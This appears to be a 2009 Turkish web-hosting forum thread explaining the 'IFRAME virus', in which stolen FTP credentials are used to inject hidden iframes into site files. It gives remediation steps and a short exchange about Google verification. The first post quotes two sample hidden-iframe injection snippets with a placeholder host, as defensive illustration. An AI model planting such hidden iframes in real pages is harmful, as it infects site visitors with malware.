İrame Virüsü Nedir? Nasıl Kurtulursunuz? - vBulletinData -Türkçe vBulletin Destek ve Bilgi Paylaşım Sitesi

NeO CoRTeX · 09-16-2009, 03:33 PM

IFRAME Virüsü nedir?

Virüslü bilgisayarlardan FTP girişi yapılan sitelerin index, default ve/veya tüm dosyalara zararlı bir IFRAME kodu yerleştirir. Virüs, sitenize giren kullanıcıların bilgisayarlarına virüs bulaştırmayı amaçlamaktadır.

Zararlı IFRAME Virüsü sitelere genellikle FTP üzerinden bulaşmaktadır.

Nasıl bulaşır :

1. Saldırgan öncelikle güncel antivirus yazılımları ile korunmayan bilgisayarınıza bir virus bulaştırır.
2. Bilgisayarınıza Bulaştırılan virüsun amacı bilgisayarınızdaki FTP Programında şifrenin saklandığı dosyayı ve/veya ftp şifrenizi çalmaktır . FTP bilgileri çalındıktan sonra, saldırgan dilediği zaman ftp girişi yapıp, sitenizin index.*, default.* veya tüm dosyalarınızın html taglarının arasına (genellikle sayfanın sonuna) iftame veya script tagı yerleştirir.

IFRAME tagı sayfanızın html tagları arasında gizlenir. Sayfanızı ziyaret eden kullanıcılara virus bulaştırmayı amaçlamaktadır.

IFRAME Virüsü sitenizdeki php, asp veya asp.net kod açıklarından da bulaşabilir. Sitenizdeki dosya ve klasörlerin yazma izinlerinin açık olmasını kullanarak dosyalarınıza bulaşabilir.

IFRAME kod örnekleri:

<IFRAME src='http://siteadresi/index.php' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></IFRAME>

echo "<IFRAME src=\"http://siteadresi\123" width=1 height=1 style=\"visibility:hidden;position:absolute\"></IFRAME>";

Korunmak için yapmanız gerekenler:

1. FTP şifrenizi değiştiriniz.
2. Bilgisayarınızda güncel bir antivirüs yazılımı kullanınız.
3. FTP şifrenizi otomatik girişe ayarlamayın veya FTP girişlerinden sonra şifrenizi değiştiriniz.
4. IFRAME Virüsü sitenizdeki php, asp veya asp.net kod açıklarından bulaşmış olabilir. Bundan korunmak için kontrol panelinizden dosyalarınızın yazma izinlerini kaldırınız, sadece gerekli dosya veya klasörlerinize yazma izni veriniz. Linux sunucularımızdan hizmet alıyorsanız FTP programınızdan özellikle index.* ve default.* dosya izinlerini 444 (read/okuma) olarak ayarlayınız.

Sitelerinizi kontrol ediniz:

Sitenizdeki index.*, default.* dosyalarını bilgisayarınıza indirip html kodlarını gözden geçiriniz. Index.* ve/veya default.* dosyalarınız temiz ise virüs bulaşmamış demektir. Virüs öncelikle bu dosyalara bulaşır. Ancak yine de diğer doslarınızın güncellenme tarihlerini gözden geçiriniz.

Zararlı kod bulaşmış dosyalarınızı temizleyiniz.

IFRAME Virüsü bulaşan siteler Google arama motoru ve Firefox tarayıcısı tarafından saldırgan site olarak sınıflandırılır. Bu sitelere giriş izni verilmez.

Siteniz Google'da saldırgan site olarak listeleniyorsa:

IFRAME Virüsü bulunan site google arama sonuçlarında saldırgan site olarak gösterilir. Bunu düzeltmek için şunları yapabilirsiniz:

1. http://www.google.com/webmasters/tools/ adresine giriş yapınız.
2. Gmail hesabınız veya yeni bir hesap ile giriş yapınız.
3. Sitenizi ekleyerek doğrulayınız.
4. Sitenizi doğruladıktan sonra, kötü amaçlı yazılım uyarısına tıklayarak, zararlı kodların bulaştığı sayfaları görün ve sayfalarınızdan zararlı kodları temizleyin.
5. Sol menüden “Siteyi tekrar değerlendirme” seçeneğine tıklayın …
6. Sitenizde bulunan zararlı kodları kaldırdığınızı ve tekrar değerlendirmelerini rica ediniz.
7. Siteniz birkaç gün içinde saldırgan site olmaktan çıkarılacaktır !

IFRAME Virüsü hakkında bilgi için:
IFRAME virüsü - Google'da Ara

**DiLaRa_NuR_35** · 09-17-2009, 08:06 AM

4 aşamaya kadar geldim .
şararlı kod olduğunu nasıl analrım
şu kod var orda
<meta name="verify-v1" content="FDygcbyuOHlH4bi3SoJiJyRj1tbdnNMrreX3UN2rW 8s=" />
şimdi ne yapmalıyım
ayriyeten şu uyarı geldi bana

Sitenizle ilgili ayrıntılı istatistikleri ve bilgileri göstermeden önce gerçekten sitenin sahibi olduğunuzu bilmemiz gerekir.
diyor site sahibi benim oldğumu nasıl ıspatarım onara

Sitenizin alan adını ararken bir hatayla karşılaştık.
Doğrulama dosyanıza erişmeye çalıştık ancak bir DNS hatası nedeniyle alanınıza erişemedik. Bunun nedeni sunucunuzun kapalı olması ya da alanınıza yönlendiren DNS ile ilgili bir sorun olabilir. Alanınızın doğru şekilde çözdüğünden emin olun ve tekrar deneyin.

Sitenizin alan adını ararken bir DNS zaman aşımıyla karşılaştık.
Doğrulama dosyanıza erişmeye çalıştık ancak bir DNS hatası nedeniyle alanınıza erişemedik. Bunun nedeni sunucunuzun kapalı olması ya da alanınıza yönlendiren DNS ile ilgili bir sorun olabilir. Alanınızın doğru şekilde çözdüğünden emin olun ve tekrar deneyin.

Bir sunucu zaman aşımı nedeniyle dosyanızı doğrulayamadık.
Bir sunucu zaman aşımı hatası aldığımız için dosyanızı doğrulayamadık. Bunun nedeni sunucunuzun kapalı olması veya meşgul olması ve yavaş yanıt vermesi olabilir. Sunucunuzun yanıt verdiğinden emin olun ve tekrar deneyin.

~~By.Kaos~~ · 09-17-2009, 10:55 AM

Kod:

        <meta name="verify-v1" content="FDygcbyuOHlH4bi3SoJiJyRj1tbdnNMrreX3UN2rW 8s=" />

Bu kodu elleme sakın bu google'nin doğrulama kodu.. Silme

Diğer sorunu anlamadım

NeO CoRTeX · 09-21-2009, 03:31 PM

kusura bakmayın uzun süre yoktum ben. malum öss hazırlık. sizin hatanızı bende tam anlayamadım askında ancak bu iframe virüsünden kurtulma aşamalarının sonuçlarından birisi değil. çünkü kendi sitemi de kurtardığımdan dolayı bunu yazdım. ancak şu anda sitem kapalı ben kapattım. öss için

09-16-2009, 03:33 PM	#1 (permalink)
NeO CoRTeX Kayıtlı Üye Date: Jun 2009 Mesajlar: 113 Tecrübe Puanı: 6	İrame Virüsü Nedir? Nasıl Kurtulursunuz? IFRAME Virüsü nedir? Virüslü bilgisayarlardan FTP girişi yapılan sitelerin index, default ve/veya tüm dosyalara zararlı bir IFRAME kodu yerleştirir. Virüs, sitenize giren kullanıcıların bilgisayarlarına virüs bulaştırmayı amaçlamaktadır. Zararlı IFRAME Virüsü sitelere genellikle FTP üzerinden bulaşmaktadır. Nasıl bulaşır : 1. Saldırgan öncelikle güncel antivirus yazılımları ile korunmayan bilgisayarınıza bir virus bulaştırır. 2. Bilgisayarınıza Bulaştırılan virüsun amacı bilgisayarınızdaki FTP Programında şifrenin saklandığı dosyayı ve/veya ftp şifrenizi çalmaktır . FTP bilgileri çalındıktan sonra, saldırgan dilediği zaman ftp girişi yapıp, sitenizin index., default. veya tüm dosyalarınızın html taglarının arasına (genellikle sayfanın sonuna) iftame veya script tagı yerleştirir. IFRAME tagı sayfanızın html tagları arasında gizlenir. Sayfanızı ziyaret eden kullanıcılara virus bulaştırmayı amaçlamaktadır. IFRAME Virüsü sitenizdeki php, asp veya asp.net kod açıklarından da bulaşabilir. Sitenizdeki dosya ve klasörlerin yazma izinlerinin açık olmasını kullanarak dosyalarınıza bulaşabilir. IFRAME kod örnekleri: <IFRAME src='http://siteadresi/index.php' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></IFRAME> echo "<IFRAME src=\"http://siteadresi\123" width=1 height=1 style=\"visibility:hidden;position:absolute\"></IFRAME>"; Korunmak için yapmanız gerekenler: 1. FTP şifrenizi değiştiriniz. 2. Bilgisayarınızda güncel bir antivirüs yazılımı kullanınız. 3. FTP şifrenizi otomatik girişe ayarlamayın veya FTP girişlerinden sonra şifrenizi değiştiriniz. 4. IFRAME Virüsü sitenizdeki php, asp veya asp.net kod açıklarından bulaşmış olabilir. Bundan korunmak için kontrol panelinizden dosyalarınızın yazma izinlerini kaldırınız, sadece gerekli dosya veya klasörlerinize yazma izni veriniz. Linux sunucularımızdan hizmet alıyorsanız FTP programınızdan özellikle index.* ve default.* dosya izinlerini 444 (read/okuma) olarak ayarlayınız. Sitelerinizi kontrol ediniz: Sitenizdeki index., default. dosyalarını bilgisayarınıza indirip html kodlarını gözden geçiriniz. Index.* ve/veya default.* dosyalarınız temiz ise virüs bulaşmamış demektir. Virüs öncelikle bu dosyalara bulaşır. Ancak yine de diğer doslarınızın güncellenme tarihlerini gözden geçiriniz. Zararlı kod bulaşmış dosyalarınızı temizleyiniz. IFRAME Virüsü bulaşan siteler Google arama motoru ve Firefox tarayıcısı tarafından saldırgan site olarak sınıflandırılır. Bu sitelere giriş izni verilmez. Siteniz Google'da saldırgan site olarak listeleniyorsa: IFRAME Virüsü bulunan site google arama sonuçlarında saldırgan site olarak gösterilir. Bunu düzeltmek için şunları yapabilirsiniz: 1. http://www.google.com/webmasters/tools/ adresine giriş yapınız. 2. Gmail hesabınız veya yeni bir hesap ile giriş yapınız. 3. Sitenizi ekleyerek doğrulayınız. 4. Sitenizi doğruladıktan sonra, kötü amaçlı yazılım uyarısına tıklayarak, zararlı kodların bulaştığı sayfaları görün ve sayfalarınızdan zararlı kodları temizleyin. 5. Sol menüden “Siteyi tekrar değerlendirme” seçeneğine tıklayın … 6. Sitenizde bulunan zararlı kodları kaldırdığınızı ve tekrar değerlendirmelerini rica ediniz. 7. Siteniz birkaç gün içinde saldırgan site olmaktan çıkarılacaktır ! IFRAME Virüsü hakkında bilgi için: IFRAME virüsü - Google'da Ara http://www.pardus.org.tr/banner/bts01.png

09-17-2009, 08:06 AM	#2 (permalink)
DiLaRa_NuR_35 Lisanslı Kullanıcı Date: May 2009 Mesajlar: 346 Tecrübe Puanı: 23	4 aşamaya kadar geldim . şararlı kod olduğunu nasıl analrım şu kod var orda <meta name="verify-v1" content="FDygcbyuOHlH4bi3SoJiJyRj1tbdnNMrreX3UN2rW 8s=" /> şimdi ne yapmalıyım ayriyeten şu uyarı geldi bana Sitenizle ilgili ayrıntılı istatistikleri ve bilgileri göstermeden önce gerçekten sitenin sahibi olduğunuzu bilmemiz gerekir. diyor site sahibi benim oldğumu nasıl ıspatarım onara Sitenizin alan adını ararken bir hatayla karşılaştık. Doğrulama dosyanıza erişmeye çalıştık ancak bir DNS hatası nedeniyle alanınıza erişemedik. Bunun nedeni sunucunuzun kapalı olması ya da alanınıza yönlendiren DNS ile ilgili bir sorun olabilir. Alanınızın doğru şekilde çözdüğünden emin olun ve tekrar deneyin. Sitenizin alan adını ararken bir DNS zaman aşımıyla karşılaştık. Doğrulama dosyanıza erişmeye çalıştık ancak bir DNS hatası nedeniyle alanınıza erişemedik. Bunun nedeni sunucunuzun kapalı olması ya da alanınıza yönlendiren DNS ile ilgili bir sorun olabilir. Alanınızın doğru şekilde çözdüğünden emin olun ve tekrar deneyin. Bir sunucu zaman aşımı nedeniyle dosyanızı doğrulayamadık. Bir sunucu zaman aşımı hatası aldığımız için dosyanızı doğrulayamadık. Bunun nedeni sunucunuzun kapalı olması veya meşgul olması ve yavaş yanıt vermesi olabilir. Sunucunuzun yanıt verdiğinden emin olun ve tekrar deneyin. www.cennetyolculari.net Konu DiLaRa_NuR_35 tarafından (09-17-2009 Saat 08:28 AM ) değiştirilmiştir.

09-17-2009, 10:55 AM	#3 (permalink)
~~By.Kaos~~ Banned Users Date: Jun 2009 Mesajlar: 0 Tecrübe Puanı: 0	Kod: <meta name="verify-v1" content="FDygcbyuOHlH4bi3SoJiJyRj1tbdnNMrreX3UN2rW 8s=" /> Bu kodu elleme sakın bu google'nin doğrulama kodu.. Silme Diğer sorunu anlamadım

09-21-2009, 03:31 PM	#4 (permalink)
NeO CoRTeX Kayıtlı Üye Date: Jun 2009 Mesajlar: 113 Tecrübe Puanı: 6	kusura bakmayın uzun süre yoktum ben. malum öss hazırlık. sizin hatanızı bende tam anlayamadım askında ancak bu iframe virüsünden kurtulma aşamalarının sonuçlarından birisi değil. çünkü kendi sitemi de kurtardığımdan dolayı bunu yazdım. ancak şu anda sitem kapalı ben kapattım. öss için http://www.pardus.org.tr/banner/bts01.png

Seçenekler
Yazdırılabilir şekli göster Sayfayı E-Mail olarak gönder
Stil
Normal Hybrid-Şeklinde gösterime geç Ağaç şeklinde gösterime geç

Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir)